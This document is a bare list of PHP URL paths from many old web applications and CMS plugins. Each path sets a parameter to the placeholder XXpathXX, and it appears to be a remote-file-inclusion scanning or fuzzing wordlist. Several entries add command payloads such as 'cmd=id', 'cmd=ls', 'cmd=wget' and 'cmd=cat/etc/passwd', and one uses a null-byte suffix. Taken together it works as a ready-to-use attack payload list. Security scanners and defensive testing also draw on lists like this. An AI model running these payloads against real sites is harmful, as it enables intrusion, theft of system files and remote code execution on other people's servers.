/biblioteca/bib_searchs.php?CLASSPATH=XXpathXX
/biblioteca/edi_form.php?CLASSPATH=XXpathXX
/biblioteca/edi_save.php?CLASSPATH=XXpathXX
/biblioteca/gen_form.php?CLASSPATH=XXpathXX
/biblioteca/gen_save.php?CLASSPATH=XXpathXX
/biblioteca/lin_form.php?CLASSPATH=XXpathXX
/biblioteca/lin_save.php?CLASSPATH=XXpathXX
/biblioteca/luo_form.php?CLASSPATH=XXpathXX
/biblioteca/luo_save.php?CLASSPATH=XXpathXX
/biblioteca/sog_form.php?CLASSPATH=XXpathXX
/biblioteca/sog_save.php?CLASSPATH=XXpathXX
/bigace/addon/smarty/plugins/function.captcha.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX
/bigace/system/admin/plugins/menu/menuTree/plugin.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/item_information.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/application/util/jstree.php?GLOBALS[_BIGACE][DIR][admin]=XXpathXX?
/bigace/system/classes/sql/AdoDBConnection.php?GLOBALS[_BIGACE][DIR][addon]=XXpathXX?
/bild.php?config[root_ordner]=XXpathXX?&cmd=id
/bin/qte_init.php?qte_root=XXpathXX?
/bingoserver.php3?response_dir=XXpathXX
/block.php?Include=XXpathXX
/blocks/birthday.php?full_path=XXpathXX
/blocks/events.php?full_path=XXpathXX
/blocks/help.php?full_path=XXpathXX
/blogcms/admin/media.php?DIR_LIBS=XXpathXX?
/blogcms/admin/xmlrpc/server.php?DIR_LIBS=XXpathXX?
/blogcms/index.php?DIR_PLUGINS=XXpathXX?
/board/post.php?qb_path=XXpathXX
/boitenews4/index.php?url_index=XXpathXX?
/books/allbooks.php?home=XXpathXX
/books/home.php?home=XXpathXX
/books/mybooks.php?home=XXpathXX
/bp_ncom.php?bnrep=XXpathXX
/bp_ncom.php?bnrep=XXpathXX?
/bp_news.php?bnrep=XXpathXX
/bridge/enigma/E2_header.inc.php?boarddir=XXpathXX?
/bridge/yabbse.inc.php?sourcedir=XXpathXX
/bridges/SMF/logout.php?path_to_smf=XXpathXX
/bu/bu_cache.php?bu_dir=XXpathXX?
/bu/bu_claro.php?bu_dir=XXpathXX?
/bu/bu_parse.php?bu_dir=XXpathXX?
/bu/process.php?bu_dir=XXpathXX?
/buddy.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/builddb.php?env_dir=XXpathXX
/button/settings_sql.php?path=XXpathXX
/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=XXpathXX?
/cal.func.php?dir_edge_lang=XXpathXX
/calcul-page.php?home=XXpathXX
/calendar.php?cfg_dir=XXpathXX?
/calendar.php?lang=XXpathXX
/calendar.php?path_to_calendar=XXpathXX
/calendar.php?vwar_root=XXpathXX?
/calendar/demo/index.php?date=&v=XXpathXX?
/calendar/payment.php?insPath=XXpathXX
/calendario/cal_insert.php?CLASSPATH=XXpathXX
/calendario/cal_save.php?CLASSPATH=XXpathXX
/calendario/cal_saveactivity.php?CLASSPATH=XXpathXX
/cart.php?lang_list=XXpathXX
/cart_content.php?cart_isp_root=XXpathXX
/catalogg/inludes/include_once.php?include_file=XXpathXX
/catalogshop.php?mosConfig_absolute_path=XXpathXX
/cdsagenda/modification/SendAlertEmail.php?AGE=XXpathXX?
/cfagcms/themes/default/index.php?main=XXpathXX
/ch_readalso.php?read_xml_include=XXpathXX
/challenge.php?vwar_root=XXpathXX
/change_preferences2.php?target=XXpathXX?
/chat.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/chat.php?my[root]=XXpathXX?cm=id
/chat/adminips.php?banned_file=XXpathXX
/chat/users_popupL.php3?From=XXpathXX
/checkout.php?abs_path=XXpathXX
/checkout.php?abs_path=XXpathXX?
/ciamos_path/modules/forum/include/config.php?module_cache_path='XXpathXX'
/circ.php?include_path=XXpathXX?
/circolari/cir_save.php?CLASSPATH=XXpathXX
/citywriter/head.php?path=XXpathXX?
/cl_files/index.php?path_to_calendar=XXpathXX?
/claroline/auth/ldap/authldap.php?includePath=XXpathXX
/claroline/phpbb/page_tail.php?includePath=XXpathXX
/claroline180rc1/claroline/inc/lib/import.lib.php?includePath=XXpathXX?
/class.mysql.php?path_to_bt_dir=XXpathXX
/class/Wiki/Wiki.php?c_node[class_path]=XXpathXX
/class/jpcache/jpcache.php?_PSL[classdir]=XXpathXX?exec=uname
/class/php/d4m_ajax_pagenav.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/classes/Auth/OpenID/Association.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/BigMath.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DiffieHellman.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/DumbStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Extension.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/FileStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/HMAC.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/MemcachedStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Message.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/Nonce.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SQLStore.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/SReg.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/TrustRoot.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/OpenID/URINorm.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRDS.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRI.php?_ENV[asicms][path]=XXpathXX
/classes/Auth/Yadis/XRIRes.php?_ENV[asicms][path]=XXpathXX
/classes/Cache.class.php?rootdir=XXpathXX?
/classes/Customer.class.php?rootdir=XXpathXX?
/classes/Performance.class.php?rootdir=XXpathXX?
/classes/Project.class.php?rootdir=XXpathXX?
/classes/Representative.class.php?rootdir=XXpathXX?
/classes/User.class.php?rootdir=XXpathXX?
/classes/admin_o.php?absolutepath=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX
/classes/adodbt/sql.php?classes_dir=XXpathXX?
/classes/board_o.php?absolutepath=XXpathXX
/classes/class_admin.php?PathToComment=XXpathXX?
/classes/class_comments.php?PathToComment=XXpathXX?
/classes/class_mail.inc.php?path_to_folder=XXpathXX
/classes/common.php?rootdir=XXpathXX?
/classes/core/language.php?rootdir=XXpathXX
/classes/dev_o.php?absolutepath=XXpathXX
/classes/file_o.php?absolutepath=XXpathXX
/classes/html/com_articles.php?absolute_path=XXpathXX
/classes/phpmailer/class.cs_phpmailer.php?classes_dir=XXpathXX
/classes/query.class.php?baseDir=XXpathXX
/classes/tech_o.php?absolutepath=XXpathXX
/classified.php?insPath=XXpathXX
/classified_right.php?language_dir=XXpathXX
/classifieds/index.php?lowerTemplate=XXpathXX
/clear.php?bibtexrootrel=XXpathXX?
/clearinfo.php?bibtexrootrel=XXpathXX?
/click.php?dir=XXpathXX?
/client.php?dir=XXpathXX
/client/faq_1/PageController.php?dir=XXpathXX
/clients/index.php?src=XXpathXX
/cls_fast_template.php?fname=XXpathXX
/cm68news/engine/oldnews.inc.php?addpath=XXpathXX?&
/cms/Orlando/modules/core/logger/init.php?GLOBALS[preloc]=XXpathXX?
/cms/meetweb/classes/ManagerResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/ManagerRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegForm.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/RegRightsResource.class.php?root_path=XXpathXX
/cms/meetweb/classes/modules.php?root_path=XXpathXX
/cms/modules/form.lib.php?sourceFolder=XXpathXX?
/cms/system/openengine.php?oe_classpath=XXpathXX???
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=XXpathXX?
/cn_config.php?tpath=XXpathXX?
/coast/header.php?sections_file=XXpathXX?
/code/berylium-classes.php?beryliumroot=XXpathXX?
/code/display.php?admindir=XXpathXX?
/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=XXpathXX
/com_booklibrary/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=XXpathXX?
/com_media_library/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_realestatemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=XXpathXX?
/comments.php?AMG_serverpath=XXpathXX
/comments.php?scriptpath=XXpathXX?
/common.inc.php?CFG[libdir]=XXpathXX
/common.inc.php?CFG[libdir]=XXpathXX?
/common.inc.php?base_path=XXpathXX
/common.php?db_file=XXpathXX
/common.php?dir=XXpathXX
/common.php?ezt_root_path=XXpathXX?
/common.php?include_path=XXpathXX
/common.php?livealbum_dir=XXpathXX?
/common.php?locale=XXpathXX
/common.php?phpht_real_path=XXpathXX?
/common/db.php?commonpath=XXpathXX?
/common/func.php?CommonAbsD=XXpathXX?
/common/func.php?CommonAbsDir=XXpathXX
/community/Offline.php?sourcedir=XXpathXX?
/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=XXpathXX
/components/calendar/com_calendar.php?absolute_path=XXpathXX?
/components/com_ajaxchat/tests/ajcuser.php?GLOBALS[mosConfig_absolute_path]=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=XXpathXX
/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=XXpathXX
/components/com_articles.php?absolute_path=XXpathXX?
/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=XXpathXX
/components/com_calendar.php?absolute_path=XXpathXX?
/components/com_cpg/cpg.php?mosConfig_absolute_path=XXpathXX?
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=XXpathXX
/components/com_facileforms/facileforms.frame.php?ff_compath=XXpathXX
/components/com_forum/download.php?phpbb_root_path=XXpathXX
/components/com_galleria/galleria.html.php?mosConfig_absolute_path=XXpathXX
/components/com_guestbook.php?absolute_path=XXpathXX?
/components/com_hashcash/server.php?mosConfig_absolute_path=XXpathXX?
/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/dwpage.php?mosConfig_absolute_path=XXpathXX
/components/com_jd-wiki/bin/wantedpages.php?mosConfig_absolute_path=XXpathXX
/components/com_joomlaboard/file_upload.php?sbp=XXpathXX?
/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=XXpathXX?
/components/com_lm/archive.php?mosConfig_absolute_path=XXpathXX?
/components/com_mambowiki/MamboLogin.php?IP=XXpathXX?
/components/com_minibb.php?absolute_path=XXpathXX
/components/com_mosmedia/media.divs.php?mosConfig_absolute_path=XXpathXX
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=XXpathXX
/components/com_mospray/scripts/admin.php?basedir=XXpathXX?&cmd=id
/components/com_mp3_allopass/allopass-error.php?mosConfig_live_site=XXpathXX
/components/com_mp3_allopass/allopass.php?mosConfig_live_site=XXpathXX
/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=XXpathXX?
/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=XXpathXX?
/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=XXpathXX
/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=XXpathXX
/components/com_reporter/processor/reporter.sql.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=XXpathXX
/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=XXpathXX?
/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=XXpathXX
/components/com_smf/smf.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=XXpathXX
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=XXpathXX
/components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=XXpathXX
/components/core/connect.php?language_path=XXpathXX
/components/minibb/bb_plugins.php?absolute_path=XXpathXX?
/components/minibb/index.php?absolute_path=XXpathXX?
/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/compteur/mapage.php?chemin=XXpathXX
/conf.php?securelib=XXpathXX
/conf.php?securelib=XXpathXX?
/config.inc.php3?rel_path=XXpathXX
/config.inc.php?_path=XXpathXX
/config.inc.php?path_escape=XXpathXX
/config.inc.php?path_escape=XXpathXX%00
/config.php?full_path=XXpathXX?
/config.php?full_path_to_db=XXpathXX
/config.php?fullpath=XXpathXX
/config.php?incpath=XXpathXX
/config.php?path_to_root=XXpathXX
/config.php?rel_path=XXpathXX?
/config.php?returnpath=XXpathXX
/config.php?sql_language=XXpathXX?
/config.php?xcart_dir=XXpathXX?
/config/config_admin.php?INC=XXpathXX?
/config/config_main.php?INC=XXpathXX?
/config/config_member.php?INC=XXpathXX?
/config/dbutil.bck.php?confdir=XXpathXX
/config/mysql_config.php?INC=XXpathXX?
/config/sender.php?ROOT_PATH=XXpathXX?
/configuration.php?absolute_path=XXpathXX?
/confirmUnsubscription.php?output=XXpathXX
/connect.php?path=XXpathXX
/connexion.php?DOCUMENT_ROOT=XXpathXX?
/contact.php?blog_theme=XXpathXX
/contacts.php?cal_dir=XXpathXX
/contenido/external/frontend/news.php?cfg[path][includes]=XXpathXX
/content.php?content=XXpathXX
/content/admin.php?pwfile=XXpathXX
/content/content.php?fileloc=XXpathXX?
/content/delete.php?pwfile=XXpathXX
/content/modify.php?pwfile=XXpathXX
/content/modify_go.php?pwfile=XXpathXX
/contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=XXpathXX
/contrib/mx_glance_sdesc.php?mx_root_path=XXpathXX
/contrib/phpBB2/modules.php?phpbb_root_path=XXpathXX?
/controllers/MySQLController.php?baseDir=XXpathXX
/controllers/SQLController.php?baseDir=XXpathXX
/controllers/SetupController.php?baseDir=XXpathXX
/controllers/VideoController.php?baseDir=XXpathXX
/controllers/ViewController.php?baseDir=XXpathXX
/convert-date.php?cal_dir=XXpathXX
/convert/mvcw.php?step=1&vwar_root=XXpathXX
/convert/mvcw.php?vwar_root=XXpathXX
/core/admin/admin.php?p=admin&absoluteurlXXpathXX
/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurlXXpathXX
/core/admin/categories_add.php?absoluteurlXXpathXX
/core/admin/categories_remove.php?absoluteurlXXpathXX
/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurlXXpathXX
/core/admin/editdel.php?p=admin&absoluteurlXXpathXX
/core/admin/ftpfeature.php?p=admin&absoluteurlXXpathXX
/core/admin/login.php?absoluteurlXXpathXX
/core/admin/pgRSSnews.php?absoluteurlXXpathXX
/core/admin/showcat.php?absoluteurlXXpathXX
/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurlXXpathXX
/core/archive_cat.php?absoluteurlXXpathXX
/core/archive_nocat.php?absoluteurlXXpathXX
/core/aural.php?site_absolute_path=XXpathXX
/core/aural.php?site_absolute_path=XXpathXX?&cmd=dir
/core/editor.php?editor_insert_bottom=XXpathXX
/core/includes.php?CMS_ROOT=XXpathXX?
/core/recent_list.php?absoluteurlXXpathXX
/corpo.php?pagina=XXpathXX
/cp2.php?securelib=XXpathXX?
/cpe/index.php?repertoire_config=XXpathXX
/crea.php?plancia=XXpathXX
/creacms/_administration/edition_article/edition_article.php?cfg[document_uri]=XXpathXX?
/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=XXpathXX?
/creat_news_all.php?language=XXpathXX
/create_file.php?target=XXpathXX?
/cron.php?ROOT_PATH=XXpathXX
/cron.php?include_path=XXpathXX?
/crontab/run_billing.php?config[include_dir]=XXpathXX?
/cross.php?url=XXpathXX
/custom_vars.php?sys[path_addon]=XXpathXX
/customer/product.php?xcart_dir=XXpathXX
/cwb/comanda.php?INCLUDE_PATH=XXpathXX?
/datei.php?config[root_ordner]=XXpathXX?&cmd=id
/db/PollDB.php?CONFIG_DATAREADERWRITER=XXpathXX?
/db/mysql/db.inc.php?SPL_CFG[dirroot]=XXpathXX?
/dbcommon/include.php?_APP_RELATIVE_PATH=XXpathXX
/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=XXpathXX
/debugger.php?config_atkroot=XXpathXX
/decoder/gallery.php?ccms_library_path=XXpathXX
/decoder/markdown.php?ccms_library_path=XXpathXX
/defaults_setup.php?ROOT_PATH=XXpathXX?cmd=ls
/defines.php?WEBCHATPATH=XXpathXX?
/demo/ms-pe02/catalog.php?cid=0&sid='%22&sortfield=title&sortorder=ASC&pagenumber=1&main=XXpathXX&
/depouilg.php3?NomVote=XXpathXX?
/development.php?root_prefix=XXpathXX?
/dfcode.php?DFORUM_PATH=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.list.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/customer.area/customer.browse.search.php?set_depth=XXpathXX?
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX
/dfd_cart/app.lib/product.control/core.php/product.control.config.php?set_depth=XXpathXX?
/dialog.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/dialogs/a.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/collorpicker.php?spaw_dir=XXpathXX&cmd=id
/dialogs/img.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/img_library.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/table.php?spaw_dir=XXpathXX?&cmd=id
/dialogs/td.php?spaw_dir=XXpathXX?&cmd=id
/digitaleye_Path/module.php?menu=XXpathXX?
/dir/prepend.php?_PX_config[manager_path]=XXpathXX
/dir_thatware/config.php?root_path=XXpathXX'
/direct.php?rf=XXpathXX
/direction/index.php?repertoire_config=XXpathXX
/directory/index.php?path=XXpathXX
/display.php?pag=XXpathXX
/display.php?path=XXpathXX
/displayCategory.php?basepath=XXpathXX
/dix.php3?url_phpartenaire=XXpathXX
/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/doc/admin/index.php?ptinclude=XXpathXX
/doceboCore/lib/lib.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=XXpathXX
/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=XXpathXX
/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=XXpathXX
/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=XXpathXX
/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=XXpathXX
/docs/front-end-demo/cart2.php?workdir=XXpathXX?
/dokeos/claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=XXpathXX?&cmd=wget%20XXpathXX
/dosearch.php?RESPATH=XXpathXX
/download.php?root_prefix=XXpathXX?
/download_engine_V1.4.3/addmember.php?eng_dir=XXpathXX
/download_engine_V1.4.3/admin/enginelib/class.phpmailer.php?lang_pathr=XXpathXX
/download_engine_V1.4.3/admin/includes/spaw/dialogs/colorpicker.php?spaw_root=XXpathXX
/downstat1.8/chart.php?art=XXpathXX?
/dp_logs.php?HomeDir=XXpathXX
/eXPerience2/modules.php?file=XXpathXX
/ea-gBook/index_inc.php?inc_ordner=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/edit.php?javascript_path=XXpathXX?
/editor.php?newsfile=XXpathXX
/editprofile.php?pathtohomedir=XXpathXX?
/editsite.php?returnpath=XXpathXX
/editx/add_address.php?include_dir=XXpathXX
/elseif/contenus.php?contenus=XXpathXX
/elseif/moduleajouter/articles/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/articles/usrarticles.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/fonctions.php?tpelseifportalrepertoire=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesign=XXpathXX
/elseif/moduleajouter/depot/usrdepot.php?corpsdesignXXpathXX
/elseif/utilisateurs/coeurusr.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/commentaire.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/enregistrement.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/espaceperso.php?tpelseifportalrepertoire=XXpathXX
/elseif/utilisateurs/votes.php?tpelseifportalrepertoire=XXpathXX
/email_subscribe.php?root_prefix=XXpathXX?
/embed/day.php?path=XXpathXX
/enc/content.php?Home_Path=XXpathXX?
/engine/Ajax/editnews.php?root_dir=XXpathXX
/engine/api/api.class.php?dle_config_api=XXpathXX?
/engine/engine.inc.php?absolute_path=XXpathXX
/engine/init.php?root_dir=XXpathXX
/engine/require.php?MY_ENV[BASE_ENGINE_LOC]=XXpathXX?
/enth3/show_joined.php?path=XXpathXX
/environment.php?DIR_PREFIX=XXpathXX
/epal/index.php?view=XXpathXX?
/errors.php?error=XXpathXX
/errors/configmode.php?GALLERY_BASEDIR=XXpathXX
/errors/needinit.php?GALLERY_BASEDIR=XXpathXX
/errors/reconfigure.php?GALLERY_BASEDIR=XXpathXX
/errors/unconfigured.php?GALLERY_BASEDIR=XXpathXX
/es_custom_menu.php?files_dir=XXpathXX
/es_desp.php?files_dir=XXpathXX
/es_offer.php?files_dir=XXpathXX
/eshow.php?Config_rootdir=XXpathXX
/esupport/admin/autoclose.php?subd=XXpathXX?
/eva/index.php3?aide=XXpathXX?
/eva/index.php3?perso=XXpathXX
/eva/index.php?eva[caminho]=XXpathXX
/event.php?myevent_path=XXpathXX
/event_cal/module/embed/day.php?path=XXpathXX
/eventcal2.php.php?path_simpnews=XXpathXX
/eventscroller.php?path_simpnews=XXpathXX
/example-view/templates/article.php?globals[content_dir]=XXpathXX?
/example-view/templates/dates_list.php?globals[content_dir]=XXpathXX?
/example-view/templates/root.php?globals[content_dir]=XXpathXX?
/example.php?site=XXpathXX
/example/gamedemo/inc.functions.php?projectPath=XXpathXX?
/examplefile.php?bibtexrootrel=XXpathXX?
/examples/patExampleGen/bbcodeSource.php?example=XXpathXX
/exception/include.php?_APP_RELATIVE_PATH=XXpathXX
/extauth/drivers/ldap.inc.php?clarolineRepositorySys=XXpathXX
/extras/mt.php?web_root=XXpathXX
/extras/poll/poll.php?file_newsportal=XXpathXX
/ezusermanager_pwd_forgott.php?ezUserManager_Path=XXpathXX
/faq.php?module_root_path=XXpathXX
/faq.php?phpbb_root_path=XXpathXX
/fckeditor/editor/dialog/fck_link.php?dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?Dirroot=XXpathXX
/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=XXpathXX?&cmd=id
/fcring.php?s_fuss=XXpathXX
/feed.php?config[root_ordner]=XXpathXX?&cmd=id
/feed/index2.php?m=XXpathXX
/files/amazon-bestsellers.php?CarpPath=XXpathXX
/files/carprss.php?CarpPath=XXpathXX
/files/compose-attach.php3?BSX_LIBDIR=XXpathXX
/files/compose-menu.php3?BSX_LIBDIR=XXpathXX
/files/compose-new.php3?BSX_LIBDIR=XXpathXX
/files/compose-send.php3?BSX_LIBDIR=XXpathXX
/files/folder-create.php3?BSX_LIBDIR=XXpathXX
/files/folder-delete.php3?BSX_LIBDIR=XXpathXX
/files/folder-empty.php3?BSX_LIBDIR=XXpathXX
/files/folder-rename.php3?BSX_LIBDIR=XXpathXX
/files/folders.php3?BSX_LIBDIR=XXpathXX
/files/login.php3?err=hack&BSX_HTXDIR=XXpathXX
/files/mainfile.php?page[path]=XXpathXX?&cmd=ls
/files/mbox-list.php3?BSX_LIBDIR=XXpathXX
/files/message-delete.php3?BSX_LIBDIR=XXpathXX
/files/message-forward.php3?BSX_LIBDIR=XXpathXX
/files/message-header.php3?BSX_LIBDIR=XXpathXX
/files/message-print.php3?BSX_LIBDIR=XXpathXX
/files/message-read.php3?BSX_LIBDIR=XXpathXX
/files/message-reply.php3?BSX_LIBDIR=XXpathXX
/files/message-replyall.php3?BSX_LIBDIR=XXpathXX
/files/message-search.php3?BSX_LIBDIR=XXpathXX
/findix/index.php?page=XXpathXX?&cmd=id
/fishcart_v3/fc_functions/fc_example.php?docroot=XXpathXX
/flushcmd/Include/editor/rich_files/class.rich.php?class_path=XXpathXX?
/fonctions/template.php?repphp=XXpathXX?
/fonctions_racine.php?chemin_lib=XXpathXX
/footer.inc.php?settings[footer]=XXpathXX
/footer.inc.php?tfooter=XXpathXX?
/footer.php?footer_file=XXpathXX
/footer.php?op[footer_body]=XXpathXX?
/form.php?path=XXpathXX?&cmd=pwd
/forum.php?cfg_file=1&fpath=XXpathXX?
/forum/forum.php?view=XXpathXX
/forum/forum82lib.php3?repertorylevel=XXpathXX?
/forum/gesfil.php?repertorylevel=XXpathXX?
/forum/lostpassword.php?repertorylevel=XXpathXX?
/forum/mail.php?repertorylevel=XXpathXX?
/forum/member.php?repertorylevel=XXpathXX?
/forum/message.php?repertorylevel=XXpathXX?
/forum/search.php?repertorylevel=XXpathXX?
/forum/track.php?path=XXpathXX
/frame.php?framefile=XXpathXX
/ftp.php?path_local=XXpathXX
/function.inc.php?path=XXpathXX
/function.php?adminfolder=XXpathXX
/function.php?gbpfad=XXpathXX
/functions.php?include_path=XXpathXX
/functions.php?pmp_rel_path=XXpathXX
/functions.php?s[phppath]=XXpathXX
/functions.php?set_path=XXpathXX?
/functions/form.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/general.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/groups.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/js.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX
/functions/prepend_adm.php?SETS[path][physical]=XXpathXX?
/functions/sections.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions/users.func.php?GLOBALS[PTH][classes]=XXpathXX?
/functions_mod_user.php?phpbb_root_path=XXpathXX?&cmd=ls
/fusebox5.php?FUSEBOX_APPLICATION_PATH=XXpathXX
/galerie.php?config[root_ordner]=XXpathXX?cmd=id
/gallery/captionator.php?GALLERY_BASEDIR=XXpathXX
/gallery/lib/content.php?include=XXpathXX?cmd=ls
/gallery/theme/include_mode/template.php?galleryfilesdir=XXpathXX
/gallerypath/index.php?includepath=XXpathXX
/games.php?id=XXpathXX
/games.php?scoreid=XXpathXX
/gbook/includes/header.php?abspath=XXpathXX?
/gemini/page/forums/bottom.php?lang=XXpathXX?
/gen_m3u.php?phpbb_root_path=XXpathXX
/genepi.php?topdir=XXpathXX
/generate.php?ht_pfad=XXpathXX?
/gepi/gestion/savebackup.php?filename=XXpathXX&cmd=cat/etc/passwd
/gestArt/aide.php3?aide=XXpathXX?
/get_session_vars.php?path_to_smf=XXpathXX
/getpage.php?page=online&doc_path=XXpathXX
/global.php?abs_path=XXpathXX?
/gorum/dbproperty.php?appDirName=XXpathXX
/gpb/include/db.mysql.inc.php?root_path=XXpathXX?
/gpb/include/gpb.inc.php?root_path=XXpathXX?
/graph.php?DOCUMENT_ROOT=XXpathXX?
/gruppen.php?config[root_ordner]=XXpathXX?&cmd=id
/handlers/email/mod.listmail.php?_PM_[path][handle]=XXpathXX
/handlers/page/show.php?sous_rep=XXpathXX
/head.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/header.inc.php?CssFile=XXpathXX
/header.php?path=XXpathXX
/header.php?wwwRoot=XXpathXX
/help.php?CONFIG[MWCHAT_Libs]=XXpathXX?
/help/index.php?show=XXpathXX
/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/helperfunction.php?includedir=XXpathXX
/hioxBannerRotate.php?hm=XXpathXX
/hioxRandomAd.php?hm=XXpathXX
/hioxstats.php?hm=XXpathXX
/hioxupdate.php?hm=XXpathXX
/home.php?a=XXpathXX
/home.php?page=XXpathXX
/home.php?pagina=XXpathXX
/home/www/images/doc/index2.php?type=XXpathXX
/home1.php?ln=XXpathXX
/home2.php?ln=XXpathXX
/hsList.php?subdir=XXpathXX?&cmd=ls
/htdocs/gmapfactory/params.php?gszAppPath=XXpathXX
/html/admin/modules/plugin_admin.php?_settings[pluginpath]=XXpathXX
/hu/modules/reg-new/modstart.php?mod_dir=XXpathXX?
/i_head.php?home=XXpathXX
/i_nav.php?home=XXpathXX
/iframe.php?file=XXpathXX
/image.php?url=XXpathXX???
/impex/ImpExData.php?systempath=XXpathXX
/import.php?bibtexrootrel=XXpathXX?
/importinfo.php?bibtexrootrel=XXpathXX?
/in.php?returnpath=XXpathXX
/inc/articles.inc.php?GLOBALS[CHEMINMODULES]=XXpathXX
/inc/config.inc.php?x[1]=XXpathXX
/inc/design.inc.php?dir[data]=XXpathXX
/inc/download_center_lite.inc.php?script_root=XXpathXX
/inc/formmail.inc.php?script_root=XXpathXX
/inc/gabarits.php?cfg_racine=XXpathXX
